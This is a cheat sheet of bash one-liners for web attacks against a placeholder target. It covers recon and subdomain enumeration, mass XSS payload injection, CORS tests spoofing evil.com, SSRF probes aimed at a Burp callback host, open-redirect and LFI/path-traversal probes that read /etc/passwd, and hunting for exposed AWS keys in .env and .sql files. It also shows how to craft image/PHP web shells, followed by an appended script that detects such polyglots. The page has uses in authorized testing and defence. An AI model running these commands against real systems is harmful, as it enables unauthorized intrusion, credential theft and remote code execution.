# One liners

## One liners

### Extracting URLs from page source

```bash
curl -s "https://target.com/" | grep -oP "(https?://|www\.)[^\"'<> ]+" | sort -u
```

### Subdomain enumeration

```bash
curl -s 'https://crt.sh/?q=%.target.com&output=json' | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
```

### Endpoint discovery

```bash
# Angular API endpoints
curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u
```

### Filtering endpoints

```bash
grep -i "admin\|login\|staging\|dashboard\|\.asp\|\.php\|\.json\|cgi\|\.xml\|\.sql\|\.db\|\.rb\|\.py\|\.sh\|\.yml\|\.yaml\|\.ini\|\.md\|\.js\|\.cfg\|env\|\.xls\|\.pdf\|\.docx" endpoints.txt | anew interesting_path.txt
```

Adjust the keywords in the grep pattern to suit the target.

### Screenshots of an IP range

```bash
IP="192.168.0"; for p in 80 443; do s=http; [ "$p" = 443 ] && s=https; for i in $(seq 0 5); do cutycapt --url="$s://$IP.$i:$p" --out="$IP.${i}_${p}.png"; done; done
```

### Target-specific wordlist generator

```bash
echo "target.com" | subfinder -silent | httpx | hakrawler | sed $'s/[./?=:&#]/\\\n/g' | anew wordlist.txt
```

### XSS scanner

```bash
echo "target.com" | waybackurls | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq

gau target.com | uro | grep '?' | sed -e 's/:80//g' -e 's/:443//g' -e 's/http:/https:/g' -e 's/=/=Sirat%22%3E%3CH1%3Exss123/g' | httpx -silent -ms '<h1>xss123'

echo "target.com" | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"

cat targets.txt | waybackurls | anew | grep "=" | gf xss | nilo | gxss -p test | dalfox pipe --skip-bav --only-poc r --silent --skip-mining-dom --ignore-return 302,404,403

waybackurls target.com | grep "=" | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq | egrep -v 'Not'
```

### CORS scanner

```bash
assetfinder target.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: https://evil.com" "{}" | grep -qi "^access-control-allow-origin: https://evil.com" && printf "\n\033[0;32m[VUL TO CORS]\033[0m %s\n" "{}"' 2>/dev/null
```

### SSRF scanner

```bash
#pip3 install queryswap

echo "https://target.com" | hakrawler -d 5 | grep "=" | python3 -m qs http%3a%2f%2fmy.burp.net
```

### Open redirect

```bash
export LHOST="URL"; gau target.com | gf redirect | qsreplace "$LHOST" | xargs -I% -P 25 sh -c 'curl -sI "%" 2>&1 | grep -qi "^Location: $LHOST" && echo "VULN! %"'

echo "https://target.com" | gau | grep =http | php -r "echo urldecode(file_get_contents('php://stdin'));"
```

### LFI

```bash
gau target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
```

### Nginx Path Traversal

```bash
cat urls.txt | httpx -nc -t 250 -p 80,443,8080,8443,4443,8888,8081 -path "///////../../../etc/passwd" -mr "root:x" -silent | anew output.txt
```

```bash
httpx -l urls.txt -path "///////../../../../../etc/passwd" -sc -mc 200 -mr 'root:'
```

### CNAME records

```bash
while read -r domain; do dig +noall +answer "$domain"; done < live-domains.txt | grep CNAME | tee -a CNAME_Records
```

### NXDOMAIN

```bash
subfinder -d target.com -silent | dnsx -silent -rcode nxdomain
```

### Finding IAM user access keys (AWS)

```bash
d=target.com; echo "$d" | subfinder -silent | httpx -silent -path ".env,.mysql_history,${d%%.*}.sql" -mc 200 -ports 80,443,8080,8443 -mr "AKIA[A-Z0-9]{16}"
```

## RCE via PNG file

```bash
# JPEG magic bytes (FF D8 FF E0) followed by the PHP payload; printf is used because plain echo -n does not interpret \x escapes
printf '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.png

# PNG magic bytes (89 50 4E 47) followed by the same payload
printf '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png
```
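As an added example (not code from the original page), a defender-side check for the image/PHP polyglot shape above, in POSIX sh: it classifies a file by its magic bytes, then looks for a PHP open tag in the body, which is exactly what an upload filter that trusts only the header or the extension misses. The function names, file names and sample contents are constructed for the demo.

```shell
# Added example, not part of the original page. Needs only POSIX sh and
# coreutils (head, od, tr, grep, mktemp). All sample files are constructed.

# First 4 bytes of a file as lowercase hex with no separators, e.g. "89504e47".
magic_hex() {
    head -c 4 "$1" | od -An -tx1 | tr -d ' \n'
}

# Classify by magic bytes only; the extension is deliberately ignored because
# an extension-based upload filter is what the polyglot bypasses.
image_type() {
    case "$(magic_hex "$1")" in
        89504e47) echo png ;;
        ffd8ff*)  echo jpeg ;;
        47494638) echo gif ;;
        *)        echo unknown ;;
    esac
}

# True (exit 0) when the file passes a magic-byte image check yet carries a
# PHP open tag (<?php or <?=) anywhere in its body; false (exit 1) otherwise.
is_image_php_polyglot() {
    [ "$(image_type "$1")" != unknown ] || return 1
    grep -aqE '<\?(php|=)' "$1"
}

# Create constructed samples in a temp dir and print its path: a JPEG-headed
# polyglot, a PNG-headed polyglot, a clean PNG header and a plain PHP file.
make_samples() {
    dir=$(mktemp -d)
    printf '\377\330\377\340<?php echo "x"; ?>.' > "$dir/poly.jpg"
    printf '\211PNG\r\n\032\n<?= "x" ?>'        > "$dir/poly.png"
    printf '\211PNG\r\n\032\n'                  > "$dir/clean.png"
    printf '<?php echo "x"; ?>'                 > "$dir/plain.php"
    echo "$dir"
}

# Scan every file in a directory and print "POLYGLOT <path>" for each hit.
scan_dir() {
    for f in "$1"/*; do
        if is_image_php_polyglot "$f"; then echo "POLYGLOT $f"; fi
    done
}
```

Run `scan_dir "$(make_samples)"` to see the two polyglot samples flagged while the clean PNG and the plain PHP file are not.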
